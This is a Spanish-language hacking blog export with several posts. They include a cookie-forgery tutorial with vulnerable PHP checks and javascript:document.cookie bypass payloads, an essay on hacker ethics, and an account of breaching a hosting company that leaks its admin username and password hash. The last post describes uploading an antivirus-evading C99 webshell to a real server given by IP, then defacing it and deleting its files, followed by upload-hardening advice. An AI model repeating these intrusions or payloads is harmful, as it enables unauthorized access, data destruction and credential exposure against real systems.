Variante de sniffing, basada en el almacenamiento de la información obtenida en el ordenador atacante. Se asocia a la obtención de la información en un sistema y no solo a la extraída del tráfico de la red. En este caso tampoco se modifica la información incluida en la transmisión.<br><br>
<b>SPAM</b><br>
Consiste en el envío masivo de un mensaje de correo a muchos usuarios destino, pudiendo llegar a saturarse los servidores de correo.<br><br>
<b>TCP Syn Flood</b><br>
Dentro de los ataques. Consiste en el envío masivo de paquetes de establecimiento de conexión (SYN) contra un sistema.<br><br>
Espero pueda servirles esta pequeña recopilación orientada a formas de atacar un sistema.
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-10036535273300281192012-06-15T11:00:00.000-07:002014-05-17T15:53:04.398-07:00Inseguridad en el manejo de CookiesEsta vulnerabilidad la vemos cada ves mas en sitios de seguridad web(Seguridad en apps webs), pero hay muchos que todavía no saben de que se trata, no saben como explotarla o no la entienden por diferentes motivos, espero solventar las dudas que tengan con este Artículo.<br><br>
Esta vulnerabilidad depende del perfil en la que la veamos puede parecer tonta o
ingeniosa. Tonta diría por la forma en la que los programadores administran las cookies
para restringir la sección de los usuarios no autorizados, e ingeniosa por la forma que los atacantes burlan la verificación.<br><br>
<h3>Cookies</h3>
Las cookies forman parte del protocolo HTTP, este protocolo se usa para
intercambiar mensajes entre el servidor y el cliente utilizando solicitudes y respuestas HTTP. El encabezado HTTP reservado para el uso de las cookies se denomina <b>Set-Cookie</b> y está compuesto por valores:<br><br>
<i>Set-Cookie: nombre=valor; domain=nombre de dominio; expires=vencimiento de la
cookie; path=ruta donde la cookie sera validada; secure</i><br><br>
<b>Ejemplo</b>:<br><br>
<i>Set-Cookie: admin=1; domain=www.web.com; expires=Friday, 2-Feb-2009 00:00:00
GMT; path=/; secure</i><br><br>
<b>Secure</b>: Solo se usa si la cookie es enviada por <b>conexion segura (SSL)</b> y es opcional.<br><br>
<h3>Explotación</h3>
La explotación de cookies es muy sencilla y no es nada del otro mundo, vamos a colocar algunos ejemplos:
<textarea class="php" name="code">
<?
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == 1)
{
echo "Bienvenido a la administración...";
}else{
echo "No estas autorizado";
}
?>
</textarea>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0SeC2hVBhtPtdDevutF9mmjXOp-xLYttWyESPW3tz6kfchjOKZw_ZGoO2gT5n83E7_NMqudZXJwNeRSf45clPi3HwAJA9UmtO00lGTwMp-ljJiEwDoVaFpt-D20tkO_RbXt_8ILFpnFUV/s1600/cookies-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0SeC2hVBhtPtdDevutF9mmjXOp-xLYttWyESPW3tz6kfchjOKZw_ZGoO2gT5n83E7_NMqudZXJwNeRSf45clPi3HwAJA9UmtO00lGTwMp-ljJiEwDoVaFpt-D20tkO_RbXt_8ILFpnFUV/s400/cookies-carluys.jpg" width="400" /></a></div><br>
En este caso tendríamos que crear una cookie con el valor 1. Lo haremos en JavaScript
pero se puede hacer con un plugin de Firefox o cualquier herramienta, el objetivo es
crear la cookie. Entonces ingresaremos en el sitio y previamente ponemos en la barra
del navegador...
<textarea class="javascript" name="code">
javascript:document.cookie="admin=1; path=/";
</textarea>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ_W3wuNFiK4Ydwv6GuRrejky3AFnUHAnYk1zWTApPrnq7Kq5NjVJHQrHHfEC6gIDrsilfyrg0W6R3qZlzZMY_DDcwH8i8NgESxVvk3JbgS-EnYBxQKoTjhDCz-oAyTyWMVj63yPMYGDcE/s1600/cookies-carluys2.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="57" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ_W3wuNFiK4Ydwv6GuRrejky3AFnUHAnYk1zWTApPrnq7Kq5NjVJHQrHHfEC6gIDrsilfyrg0W6R3qZlzZMY_DDcwH8i8NgESxVvk3JbgS-EnYBxQKoTjhDCz-oAyTyWMVj63yPMYGDcE/s400/cookies-carluys2.jpg" /></a></div><br>
Ahora entramos nuevamente al login y tendrás acceso a la administración en este caso...<br><br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9g25LphEFB09KMM7b1sq3XVoeYCGMVWq80rYkfM7twF-BqUAv71_jKue2AKx3NKPLBT2DHm4yoS79IDTS26L4UQ4I92GCa0hVkUm4jatAlSdeI-Zc6KiFQmqNWl1lG44dQC0mz170XOUq/s1600/cookies-carluys3.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9g25LphEFB09KMM7b1sq3XVoeYCGMVWq80rYkfM7twF-BqUAv71_jKue2AKx3NKPLBT2DHm4yoS79IDTS26L4UQ4I92GCa0hVkUm4jatAlSdeI-Zc6KiFQmqNWl1lG44dQC0mz170XOUq/s400/cookies-carluys3.jpg" /></a></div><br>
<b>Otro Ejemplo:</b>
<textarea class="php" name="code">
<?
if($_COOKIE['user'] == 1 && $_COOKIE['pass'] == 1)
{
echo "Autorizado";
}else{
echo "No autorizado";
}
?>
</textarea>
Como en el caso anterior entramos a la web e insertamos...
<textarea class="php" name="code">
javascript:document.cookie="user=1; path=/"; document.cookie="pass=1; path=/";
</textarea>
Ahí creamos 2 cookies la cual sirven para pasar la verificación. Entramos nuevamente a
la web siendo ya autorizado.<br><br>
<b>Y el último ejemplo:</b>
<textarea class="php" name="code">
<?
$user = md5(base64_encode("admin"));
if($_COOKIE['usuario'] == $user && $_COOKIE['pass'] == 1)
{
echo "Administración";
}else{
echo "Acceso Incorrecto";
}
?>
</textarea>
Bueno hay que explicar unas cosas de este ejemplo, primero tenemos que saber como
sacar el nombre del usuario para que posteriormente podamos encriptar primero en
base64 y después en md5, como no somos magos como para adivinar el usuario
tenemos que usar la lógica... bien puede ser un nombre de usuario por default (como
admin, administrador etc..) o sino nos podemos fijar quien postea en la web, en la
mayoria de los CMS dice el usuario que posteo. Supongamos que tiene como usuario
"admin" (como el script de arriba) entonces encriptamos el usuario para que podamos
crear la cookie con ese valor como muestro abajo:
<textarea class="php" name="code">
javascript:document.cookie="usuario=db69fc039dcbd2962cb4d28f5891aae1; path=/";
document.cookie="pass=1; path=/";
</textarea>
Asi creando las cookies tendremos nuevamente acceso a la administración.<br><br>
<h3>Posibles Soluciones</h3>
Podemos utilizar cookies pero manejarlas de la forma correcta para que no puedan
bypassear la verificación, con manejarla de la forma correcta me refiero a que no hagan
una verificacion estatica, que sea dinamica depende del administrador, ejemplo que en
la cookie guarde un usuario(elejido por el admin previamente) y la contraseña
codificadas, entre otras posibilidades...<br><br>
Tambien podemos combinar verificaciones ejemplo cookies y sessiones, queda a
imaginacion de uno de como armar la verificacion siempre y cuando este seguro que la
verificación sea segura...<br><br>
<h3>Descarga de Plugins Firefox</h3>
<ul>
<li><a href="https://addons.mozilla.org/es-ES/firefox/addon/live-http-headers/">Live HTTP Headers 0.14</a></li>
<li><a href="https://addons.mozilla.org/es-ES/firefox/addon/add-n-edit-cookies/">Add N Edit Cookies 0.2.1.3</a></li>
</ul>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-57606912415782060592012-05-26T10:53:00.000-07:002012-05-26T10:53:58.607-07:00¿Por qué me enamoré de los hackers? (Merce Molist - Hackstory.net)<div class="separator" style="clear: both; text-align: left;">
<a href="http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2012/05/25/navegante/1337954941_extras_ladillos_1_0.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="302" width="230" src="http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2012/05/25/navegante/1337954941_extras_ladillos_1_0.jpg" /></a></div>
Encontré un gran artículo que define de manera perfecta y muy buena a un hacker, este artículo es mucho más que un artículo y se merece ser publicado.<br><br>
¿Que por qué me enamoré de los hackers? Porque son gente lista y genial, de inacabable <b>curiosidad</b>, <b>sentido del humor y vorazmente críticos</b>, capaces de ponerlo todo patas arriba porque se les ocurrió una idea y <b>con una ética colectiva que está cambiando el mundo</b>.<br><br>
¡Ah, no! ¿Que no es así como pensabas que eran los hackers? <b>¿Imaginabas unos tipos malvados, delincuentes habituales, sin empacho en asaltar tu ordenador y tu cuenta bancaria?</b> ¿Esos de los que hablan día sí día también los medios y la policía, poniéndoles la etiqueta de 'hacker'?<br><br>
Bueno, sí, son hackers, si te ciñes a la definición estricta: "Persona que disfruta explorando los detalles de cómo funcionan sistemas, ordenadores y redes, opuesto a la mayoría de usuarios, que prefieren aprender lo mínimo necesario". Sí, todos son expertos en tecnología, pero a los hackers dedicados al Mal la comunidad prefiere llamarlos 'hackers de sombrero negro', 'hackers malos', 'crackers'... ángeles caídos.<br><br>
<b>Los hackers que yo amo no matarían una mosca</b>. No te digo que no se hayan divertido alguna vez asaltando un sistema, pero no roban ni destruyen. Curiosean. Avisan de que hay tal problema. Un hacker, dice un amigo, es alguien capaz de encontrar una solución elegante a un problema importante. Eso valoran los hackers. <b>No el dinero que puedan robar. Su tesoro es el conocimiento. Están más allá</b>.<br><br>
<b>Ellos crearon la Red</b>. Crearon los primeros ordenadores, los primeros programas que dieron vida a los ordenadores, las redes y protocolos que los pusieron en contacto.<br><br>
<b>Internet es hija de la comunidad hacker</b> y la forma como está montada, como funciona, transmite su forma de ser. Por eso <b>quien entra</b>, <b>cambia</b>. Mucho o poco, pero cambian sus conexiones neuronales y sociales, se activan ideas y un sentido de la moral que quizás ya tenía, pero estaba durmiendo, sin espacio donde expresarse.<br><br>
<b>Es por eso que el sistema, ese gigante con pies de barro, ahora hasta el cuello, criminaliza a la comunidad hacker</b>. Sabe que su forma de pensar es su perdición porque es parte del nuevo mundo que vemos eclosionar a nuestro alrededor. <b>Los Indignados no existirían sin Internet</b>. Todos los cambios sociales que estamos viviendo pasan por la red. Ellos, los hackers, la construyeron. Y la gente no hace más que ser digna de este legado.<br><br>
La comunidad hacker tiene una ética comunmente aceptada que dice cosas como las siguientes: "El acceso a los ordenadores y a todo lo que te pueda enseñar alguna cosa sobre cómo funciona el mundo debe ser ilimitado y total". "<b>Toda la información debería ser libre</b>". "No creas a la autoridad, promueve la descentralización". ¿Qué, te gustan? ¡<b>A ver si tú también te habrás enamorad@ de los hackers</b>!<br><br>
<i>Merce Molist Fundadora de <a href="http://Hackstory.net">Hackstory.net</a></i><br><br>
<b>Fuente</b>: <a href="http://www.elmundo.es/elmundo/2012/05/25/navegante/1337954941.html">Elmundo.es</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-42491923866565271652012-05-15T20:26:00.001-07:002012-05-15T20:51:20.762-07:00UperHosting Hacked<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgItWQTwk7MP4A1TWZTLGgzHnjPLRN3HdenR7LNwOT7UWsOgMoszpVu8g0akBngq5idtMgWrPLvVJFibxz4MVaPLhh2edQt5Wnut3OL_ETPBeJrllcNTVQMLk9hO_a09zVyI3Ridrl7yIOE/s1600/uperhosting.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="60" width="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgItWQTwk7MP4A1TWZTLGgzHnjPLRN3HdenR7LNwOT7UWsOgMoszpVu8g0akBngq5idtMgWrPLvVJFibxz4MVaPLhh2edQt5Wnut3OL_ETPBeJrllcNTVQMLk9hO_a09zVyI3Ridrl7yIOE/s400/uperhosting.png" /></a></div><br>
<a href="http://www.uperhosting.com/">UperHosting</a>, este es un sitio que se encarga(o se encargaba) de vender hosting y dominios, y de lo que se encargaba también era en robar datos, sistemas y scripts que se alojaban en los hosting de los clientes(Supuesta clientela) la mayoría son sitios creados para obtener pagerank y más trafico web.<br><br>
Existen diversas compañías de hosting y dominios que realizan la misma operación, pero en la que pude acceder fue Uperhosting, no lo voy a negar, me dieron ganas de hackear <a href="http://apured.com/">apured</a>, pero su sistema de seguridad es inminente, bueno no quiero extenderme mucho y publicaré un vídeo que realice.<br><br>
<center>
<iframe width="420" height="315" src="http://www.youtube.com/embed/zcAWI0UGXiU" frameborder="0" allowfullscreen></iframe></center><br>
Logre acceder a su base de datos y todo ver y manipular los dominios y hosting, menos añadir o crear uno, tampoco no pude acceder al panel de cliente ni mucho menos pude como Administrador, trate de crear nombres de usuario y todo desde la webshell y no funciono nada aparte de que casi todos los datos estaban encriptados en MD5 menos los nombres de usuario y direcciones de dominio se me dificulto mas eso si, todo el servidor quedo defaceado, desde el panel de clientes hasta la página principal.<br><br>
<h3>Datos</h3>
Algunos datos.
<ul>
<li><a href="https://sites.google.com/site/carluisweb/archivos/db.php">Archivo de configuración base de datos MySQL</a></li>
<li><b>Usuario Administrador</b>: Fernando</li>
<li><b>Contraseña Administrador encriptada</b>: cf02e0a97c1cb4cf62d2950ab02e1a3d</li>
<li><b>Usuario Host</b>: uperhost</li>
</ul>
Ninguna web es invulnerable y por eso, hoy Uperhosting cayo...Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-5177014300366239033.post-58314747725578386092012-04-23T10:51:00.000-07:002012-04-23T10:51:56.048-07:00Casi accediendo a un WordPress (Hacking)En esta oportunidad dejare un vídeo de como casi acceder a un WordPress, digo casí por que solamente tenemos la opción de ser administrador en la página principal del blog, pero no podemos acceder al panel de control (Escritorio) ya que los permisos de administrador a los usuarios se establece desde allí.<br><br>
Y la verdad es que se me dificulto acceder desde la cuenta principal de administrador por que hasta la contraseña estaba codificada y actualmente no dispongo de mucho tiempo para generalizar, pues cree un nuevo usuario con la finalidad de que fuese administrador o simplemente miembro pero me lleve la sorpresa de que no tenia permisos para acceder al panel (era de suponerse).<br><br>
<center>
<iframe width="470" height="315" src="http://www.youtube.com/embed/M4YhnJ77R0A" frameborder="0" allowfullscreen></iframe>
</center><br>
Cómo lo dije antes es solo un intento de logueo en el panel de administración, ya que no pude acceder sinó solamente a la administración de la página principal, pueden implementar diversos métodos avanzados, yo realice solo esta forma por falta de tiempo, demasiado ocupado con los estudios y que me pareció un servidor no estable para durar mucho tiempo intentando acceder.<br><br>
En otras oportunidades traeré diversos tutoriales orientados a Wordpress.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-5177014300366239033.post-42113706307137727842012-04-03T18:30:00.000-07:002014-05-17T15:58:22.691-07:00Atacando servidor - Vulnerabilidad PHP Upload unijimpe (Ataque y Prevención)Vagando por la red, pude observar un upload realizado en PHP totalmente vulnerable a WebShell, la verdad no es sorpresa para mi por que yo implemente este Upload en PHP hace mucho tiempo por cierto en el año 2009 en un sitio web sobre desarrollo web y programación el cual yo administraba, y la cual fue atacado por <b><a href="http://www.zone-h.org/archive/notifier=dr.militan-53%2521">dr.militan-53!</a></b> de <a href="http://www.zone-h.org/">Zone-H.org</a>.<br><br>
El mirror que indexo zone-h es este: <a href="http://www.zone-h.org/mirror/id/8963658">simpleforo.com hacked by dr.militan-53!</a>.<br><br>
Como todo newbie, subí el upload y no analice del todo el código del archivo y no pude fijarme pues me realizaron un deface un WebShell supongo.<br><br>
<h3>Empecemos</h3>
Pero hoy no estoy para recordar viejos tiempos, hoy expongo aquí una forma de atacar y de prevenir este tipo de hackeo, Bien voy a utilizar un servidor maligno utilizado para robo y almacenamiento de datos de imágenes y cuentas de un juego online que actualmente tiene 48.73 GB de espacio utilizado, en realidad pura shit es lo que hay allí pero no soy quién para juzgar, bueno solo le quedan 3.97 GB un (8.15%) de espacio libre, entonces pronto lo dejaremos limpiecito.<br><br>
El servidor es este: <a href="http://190.93.130.109">http://190.93.130.109</a><br>
El upload se ubica en: <a href="http://190.93.130.109/Fotos/upload.php">http://190.93.130.109/Fotos/upload.php</a><br><br>
Ahora voy a introducir una WebShell muy popular que pueden descargar <a href="https://sites.google.com/site/carluisweb/archivos/shell_base64.rar">desde aquí</a> llamada: <b>C99Shell v. 1.0</b>, por cierto esta codificada en base64 para que no la detecte ningún antivirus, muy bien, voy a subir la WebShell y nos muestra lo siguiente:<br><br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC51-pT2lwU2BicZOrW2PsP_piLFakpBwHu7EQo2aBCRGytL-vFWMFWFvVSoFRsi4SQf6cmEzKX4UbWRAkjhezHbkpqXlRnv7I5e5CL3ZXfISPjJPQcJgBUzpso7f_H6a-3MCMAlREpXD-/s1600/servidorconwebshell-carluys.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="270" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC51-pT2lwU2BicZOrW2PsP_piLFakpBwHu7EQo2aBCRGytL-vFWMFWFvVSoFRsi4SQf6cmEzKX4UbWRAkjhezHbkpqXlRnv7I5e5CL3ZXfISPjJPQcJgBUzpso7f_H6a-3MCMAlREpXD-/s400/servidorconwebshell-carluys.png" /></a></div><br>
Ahora voy a dirigirme a editar el archivo <b>index.php</b> y defacear el servidor, al realizar esta acción voy a dejar mi huella marcada en el servidor, pueden verla accediendo desde aca <a href="http://190.93.130.109">http://190.93.130.109</a>, muy bien ahora que tengo control total voy a eliminar todos los archivos malignos y no malignos que este servidor contenga, como dije antes voy a limpiar todo, solamente dejaré el index defaceado y la carpeta dónde se ubica el upload para que puedan verlo, editare el upload para que no se afanen ustedes jaja.<br><br>
Ahora selecciono los archivos a eliminar, como pueden ver contenia archivos ejecutables probablemente malignos de algún servidor de un juego online:<br><br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiblkuQieW8_tsPgaLVoJR0lDnXeMWYJzSh3UWIdYPtFaWk-e1kEIoXeMFTKca_RKnKz8nHh7bnmPcIwGlo1A5dMn-IRhj41l0oJf5LqWqUV1QG3X18xKtbPtQpTAtVnM6RNXLnaCcqKFUx/s1600/servidorconwebshell-carluys2.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="270" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiblkuQieW8_tsPgaLVoJR0lDnXeMWYJzSh3UWIdYPtFaWk-e1kEIoXeMFTKca_RKnKz8nHh7bnmPcIwGlo1A5dMn-IRhj41l0oJf5LqWqUV1QG3X18xKtbPtQpTAtVnM6RNXLnaCcqKFUx/s400/servidorconwebshell-carluys2.png" /></a></div><br>
Elimine todos los archivos seleccionados y solamente nos quedo nuestro <b>index.php</b> y la carpeta Fotos que contenía el <b>Upload PHP vulnerable</b>, ya hemos concluido con el hackeo de este servidor.<br><br>
<h3>Un vídeo</h3>
<center>
<iframe width="420" height="315" src="http://www.youtube.com/embed/rFGH1kQbjQ4" frameborder="0" allowfullscreen></iframe></center>
<br><br>
<h1>Prevención</h1>
<h3>El upload php unijimpe Vulnerable</h3>
Este upload acepta archivos PHP y permite ejecutarlos facilmente, aca pueden ver un <a href="http://www.exploit-db.com/exploits/10732/">Exploit PHP upload - (unijimpe) Remote File Upload Vulnerability</a>, claramente se puede ver que también acepta WebShell transformadas en imágenes ejemplo: <b>shell.php.pjpeg</b>.<br><br>
Por suerte existe una solución y una forma de añadir seguridad desde este artículo que preparo Unijimpe en su blog: <a href="http://blog.unijimpe.net/seguridad-en-upload-de-archivos/">Seguridad en Upload de Archivos</a>.<br><br>
<h3>Pasos preventivos</h3>
Los pasos que se pueden seguir son:
<ul>
<li>El archivo subido nunca debe ser accesible inmediatamente por el cliente.</li>
<li>Generar nombres aleatorios a los archivos subidos.</li>
<li>Filtrar los archivos para no permitir archivos PHP.</li>
<li>Subir los archivos a carpetas fuera del directorio de publicación.</li>
<li>Utilizar is_uploaded_file para verificar que el archivo se ha subido.</li>
<li>Utilizar move_uploaded_file para copiar el archivo al directorio final.</li>
</ul>
<h3>En el caso de imágenes</h3>
<ul>
<li>Verificar el Content-Type del archivo para asegurarse que el archivo es una imagen.</li>
<li>Verificar si el archivo es imagen con la función getimagesize.</li>
<li>Limitar el archivo a un máximo de tamaño.</li>
</ul>
<h3>Implementado Clase PHP para Upload</h3>
Siguiendo las reglas que hemos mencionado hemos creado una pequeña clase que facilita el subir archivos, Entonces se crea un archivo llamado <b>upload.php</b> donde se incluya el siguiente código:
<textarea class="php" name="code">
// file: upload.php
// author: http://blog.unijimpe.net
// date: 27/02/2010
class Upload {
var $maxsize = 0;
var $message = "";
var $newfile = "";
var $newpath = "";
var $filesize = 0;
var $filetype = "";
var $filename = "";
var $filetemp;
var $fileexte;
var $allowed;
var $blocked;
var $isimage;
var $isupload;
function Upload() {
$this->allowed = array("image/bmp","image/gif","image/jpeg","image/pjpeg","image/png","image/x-png");
$this->blocked = array("php","phtml","php3","php4","js","shtml","pl","py");
$this->message = "";
$this->isupload = false;
}
function setFile($field) {
$this->filesize = $_FILES[$field]['size'];
$this->filename = $_FILES[$field]['name'];
$this->filetemp = $_FILES[$field]['tmp_name'];
$this->filetype = mime_content_type($this->filetemp);
$this->fileexte = substr($this->filename, strrpos($this->filename, '.')+1);
$this->newfile = substr(md5(uniqid(rand())),0,8).".".$this->fileexte;
}
function setPath($value) {
$this->newpath = $value;
}
function setMaxSize($value) {
$this->maxsize = $value;
}
function isImage($value) {
$this->isimage = $value;
}
function save() {
if (is_uploaded_file($this->filetemp)) {
// check if file valid
if ($this->filename == "") {
$this->message = "No file upload";
$this->isupload = false;
return false;
}
// check max size
if ($this->maxsize != 0) {
if ($this->filesize> $this->maxsize*1024) {
$this->message = "Large File Size";
$this->isupload = false;
return false;
}
}
// check if image
if ($this->isimage) {
// check dimensions
if (!getimagesize($this->filetemp)) {
$this->message = "Invalid Image File";
$this->isupload = false;
return false;
}
// check content type
if (!in_array($this->filetype, $this->allowed)) {
$this->message = "Invalid Content Type";
$this->isupload = false;
return false;
}
}
// check if file is allowed
if (in_array($this->fileexte, $this->blocked)) {
$this->message = "File Not Allowed - ".$this->fileexte;
$this->isupload = false;
return false;
}
if (move_uploaded_file($this->filetemp, $this->newpath."/".$this->newfile)) {
$this->message = "File succesfully uploaded!";
$this->isupload = true;
return true;
} else {
$this->message = "File was not uploaded please try again";
$this->isupload = false;
return false;
}
} else {
$this->message = "File was not uploaded please try again";
$this->isupload = false;
return false;
}
}
}
</textarea>
Esta clase contiene:
<ul>
<li><b>setFile</b>: nombre del campo del formulario que deseamos subir.</li>
<li><b>setPath</b>: carpeta donde se guardará el archivo.</li>
<li><b>setMaxSize</b>: permite definir el tamaño máximo del archivo (opcional).</li>
<li><b>isImage</b>: permite definir si se hará verificación de imágenes.</li>
<li><b>save</b>: guarda el archivo en la carpeta de destino.</li>
</ul>
Dos propiedades útiles:
<ul>
<li><b>isupload</b>: devuelve verdadero o falso indicando si el archivo se ha subido.</li>
<li><b>message</b>: devuelve un mensaje indicando que ocurrió en el proceso.</li>
</ul>
<h3>¿Como utilizar?</h3>
Creamos un formulario con un campo llamado "archivo" y adicionalmente un campo oculto que lo utilizaremos para verificar que el formulario se ha enviado.
<textarea class="html" name="code"><form method="post" enctype="multipart/form-data">
<input name="archivo" type="file" id="archivo" />
<input name="enviar" type="submit" id="enviar" value="Upload File" />
<input name="action" type="hidden" value="upload" />
</form></textarea>
El siguiente paso es incluir el archivo al inicio de nuestro script, luego creamos una instancia de la clase, definimos la carpeta donde se guardarán los archivos, el nombre del campo y procedemos al upload del archivo.
<textarea class="php" name="code">require("upload.php");
if ($_POST["action"] == "upload") {
$fupload = new Upload();
$fupload->setPath("files");
$fupload->setFile("archivo");
$fupload->save();
echo $fupload->message;
}</textarea>
Esta clase implementa algunos puntos para asegurar nuestros scripts, pero efectivamente no es completamente seguro ya que hay varias técnicas de como penetrar como se explica en <a href="http://blog.unijimpe.net/seguridad-en-upload-de-archivos/www.scanit.be/uploads/php-file-upload.pdf">Secure file upload in PHP web applications</a>.<br><br>
Puede descargar el upload <a href="http://blog.unijimpe.net/download/upload-php.zip">desde aquí</a>.<br><br>
<h3>Recomendaciones Adicionales</h3>
Lo que unijimpe recomienda es lo siguiente:
<ul>
<li>Cambiar el titulo de la página "<b>PHP upload - unijimpe</b>", los atacantes hacen una busqueda de esta palabra y pueden ubicar las páginas que utilizan este script el cual puede ser atacado. Entonces si vas a utilizar el script de upload por lo menos hay que cambiar el título al ejemplo descargado.</li>
<li>Otra sugerencia es no mostrar el archivo recién subido, el administrador debe revisarlo antes que sea publicado.</li>
<li>Agregar la validación por content-type, por la extensión del archivo como hemos mencionado en este post.</li>
<li>Filtrar los archivos y solo permitir los archivos necesarios.</li>
</ul><br>
<b>Más información</b><br>
Puedes obtener más información complementaria desde estos enlaces:
<ul>
<li><a href="http://www.mysql-apache-php.com/fileupload-security.htm">Implementing PHP File Upload Security</a></li>
<li><a href="http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/">Secure File Upload in PHP Web Applications</a></li>
<li><a href="http://www.scanit.be/uploads/php-file-upload.pdf">Secure file upload in PHP web applications (pdf)</a></li>
<li><a href="http://php.about.com/od/advancedphp/qt/upload_security.htm">PHP File Upload Security Ideas</a></li>
</ul>Unknownnoreply@blogger.com8